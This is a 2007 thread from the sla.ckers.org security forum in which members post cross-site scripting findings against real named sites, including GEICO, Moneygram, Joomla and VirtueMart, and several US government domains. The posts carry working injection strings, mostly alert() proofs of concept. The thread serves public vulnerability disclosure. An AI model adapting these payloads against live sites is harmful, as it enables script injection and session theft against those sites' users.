Paid Advertising

SLA.CKERS.ORG
HA.CKERS SLACKING
sla.ckers.org web application security lab forums
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
Re: So it begins
Posted by: .mario (IP Logged)
Date: February 02, 2007 03:16PM

XSSQLi - deadly combo...

[www.mrrc.de]

---
g:0in~/*for another*/~alert(!!1)
(Å='',[Ç=!(µ=!Å+Å)+{}][Ç[ª=µ[++Å]+µ[Å-Å],È=Å-~Å]+Ç[È+È]+ª])()[Ç[Å]+Ç[Å+Å]+µ[È]+ª](Å)
me || PHPIDS || Twitter || <malicious></markup>

Re: So it begins
Posted by: kirke (IP Logged)
Date: February 02, 2007 06:34PM


Re: So it begins
Posted by: kirke (IP Logged)
Date: February 02, 2007 06:40PM

[www.moneybookers.com]
touch the search field `and money moves`

Re: So it begins
Posted by: tx (IP Logged)
Date: February 02, 2007 07:04PM

[moneygram.com]"onmouseover="alert(this.innerText);"&LC=EN

mouseover the navigation links.

-tx @ lowtech-labs.org

Re: So it begins
Posted by: kirke (IP Logged)
Date: February 02, 2007 07:16PM

rather frame spoofing than XSS, anyway feel happy if your flight is controlled by DFS ;-)
[www.dfs.de]

Re: So it begins
Posted by: kirke (IP Logged)
Date: February 02, 2007 07:39PM

In the frontline to copyright your XSS
[www.gvu.de]



Edited 1 time(s). Last edit at 02/03/2007 03:59AM by kirke.

Re: So it begins
Posted by: rsnake (IP Logged)
Date: February 03, 2007 05:53PM

[www.adobe.com]

- RSnake
Gotta love it. http://ha.ckers.org

Re: So it begins
Posted by: xknown (IP Logged)
Date: February 06, 2007 07:01AM


google xss
Posted by: alf (IP Logged)
Date: February 06, 2007 02:20PM

yes I'm good ;-)

google XSS flaw by me ( [www.mybeNi.tk] )

[www.google.com]


cheers

btw they were notified.



Edited 2 time(s). Last edit at 02/08/2007 09:16AM by alf.

Re: So it begins
Posted by: tx (IP Logged)
Date: February 07, 2007 08:15PM

I'm gonna go ahead and throw these up here because it appears to be fixed in Joomla 1.0.12 (although that may only be with sites that are using SEF URLs, I'm gonna test it further this evening).
In any event:
[www.joomlapolis.com]";//><script>alert(String.fromCharCode(88,83,83));</script><p%20id="3/

[virtuemart.net]";//></script><script>alert(1);var%20i="i

[virtuemart.net]";//><script>alert(1);</script><p%20id="3

[virtuemart.net]";//><script>alert(1);</script><p%20id="3

-tx @ lowtech-labs.org



Edited 1 time(s). Last edit at 02/07/2007 08:15PM by tx.

Re: So it begins
Posted by: Jizzabel (IP Logged)
Date: February 08, 2007 06:44AM


Re: So it begins
Posted by: Luny (IP Logged)
Date: February 09, 2007 04:28PM

[frwebgate.access.gpo.gov]:

[ats.nist.gov];

xss with error & script info displayed:
[cindex.camden.gov.uk];

cleaner output of the above url (no xss):
[cindex.camden.gov.uk]

[www.csm.ornl.gov]

[www.ca.sandia.gov];

---------------
Digital footprints suck. Learn to walk on your hands.
[www.youfucktard.com]



Edited 4 time(s). Last edit at 02/09/2007 08:01PM by Luny.

Re: So it begins
Posted by: Hong (IP Logged)
Date: February 12, 2007 02:48AM

[myweb2.search.yahoo.com]
[www.yahoo.americangreetings.com]
IE6 only

[search.xanga.com]
[www.jobsdb.com]
[search.tom.com]

- Hong



Edited 1 time(s). Last edit at 02/12/2007 05:04AM by Hong.

Re: So it begins
Posted by: bubbles (IP Logged)
Date: February 12, 2007 10:43PM

Go to
[www.fbijobs.gov]

and enter <script>alert("xss");</script> in the search field. I tried to find whiteacids script that forwards post vulns... But I couldnt.

-bubbles
[webmastertutorials.net]

Re: So it begins
Posted by: Lockdown (IP Logged)
Date: February 13, 2007 02:26AM

You fat:

[www.rawrcore.net]

.GOV EXPLOITS! H0mGAZ!11

[www.rawrcore.net]

and I guess I'll throw this one out there because I published like a year ago and no one seemed to care:

[secure.geico.com]

WHY DOES EVERYONE IGNORE MY EXPLOITS!!??! WAHHH!!1

Re: So it begins
Posted by: trev (IP Logged)
Date: February 13, 2007 09:06AM

bubbles, you don't need the post forwarder. This form accepts GET input: [www.fbijobs.gov]

But this one has been there already: [sla.ckers.org]

Re: So it begins
Posted by: trev (IP Logged)
Date: February 13, 2007 12:24PM

It is ironical... [marketwatch.nytimes.com]



Edited 1 time(s). Last edit at 02/13/2007 12:25PM by trev.

Re: So it begins
Posted by: rdivilbiss (IP Logged)
Date: February 13, 2007 12:28PM

Lockdown Wrote:
>
> [secure.geico.com]
> A_firstName=lawl%22%3E%3Cbody%20onload=%22alert('l
> ol');document.write('An%20XSS%20so%20easy,%20even%
> 20a%20caveman%20can%20do%20it.');%22%3E%3Cspan
>
>

Funny how much they spend on TV ads, and apparently little on the IT side.

I love their TV commercials, though, LOL.

Re: So it begins
Posted by: bubbles (IP Logged)
Date: February 13, 2007 04:28PM

@Trev
Yeah, I figured it had been found already, but I didnt want to search through 39 pages to find it :)

-bubbles
[webmastertutorials.net]

Re: So it begins
Posted by: trev (IP Logged)
Date: February 13, 2007 05:10PM

bubbles, you don't have to - that's what the forum search is for.

Re: So it begins
Posted by: bubbles (IP Logged)
Date: February 14, 2007 08:23AM

Orly, I didnt even know this forum had a search... I'll keep that in mind for next time.

-bubbles
[webmastertutorials.net]

Re: So it begins
Posted by: Lockdown (IP Logged)
Date: February 14, 2007 09:47PM

<3 Geico commercials.

Cigarrettes [www.smokerswelcome.com]

[www.philipmorrisusa.com]

-Lockdown-

[www.rawrcore.net]



Edited 2 time(s). Last edit at 02/15/2007 01:55AM by Lockdown.

Re: So it begins
Posted by: tx (IP Logged)
Date: February 15, 2007 05:04PM

[www.networkcomputing.com]";alert(String.fromCharCode(88,83,83));ds_pageName="

-tx @ lowtech-labs.org

Re: So it begins
Posted by: kirke (IP Logged)
Date: February 16, 2007 01:58PM

nice list with mainly (i)frame spoofing again, posting from SkyOut seen at lists.grok.org.uk/pipermail/full-disclosure/2007-February/052496.html :

[baseportal.com]

your money is as save as XSS in austria ;-)

Re: So it begins
Posted by: rsnake (IP Logged)
Date: February 16, 2007 05:21PM

[www.mpaa.org]

- RSnake
Gotta love it. http://ha.ckers.org

Re: So it begins
Posted by: tx (IP Logged)
Date: February 16, 2007 05:36PM

nice one!

-tx @ lowtech-labs.org

Re: So it begins
Posted by: Lockdown (IP Logged)
Date: February 16, 2007 08:37PM


Re: So it begins
Posted by: kirke (IP Logged)
Date: February 17, 2007 02:30PM

XSS friendly site, inserts type="text/javascript" if we forget it :-))

[www.bvdw.org]

Re: So it begins
Posted by: Lockdown (IP Logged)
Date: February 17, 2007 09:45PM

ROFL @ Above

We know we're insecure, but we can't have hackers not adhering to w3c standards!

-Lockdown-

[www.rawrcore.net]

Re: So it begins
Posted by: rsnake (IP Logged)
Date: February 17, 2007 10:57PM

Hahah! I've never seen that before. How nice of them to help you out like that.

- RSnake
Gotta love it. http://ha.ckers.org



Sorry, only registered users may post in this forum.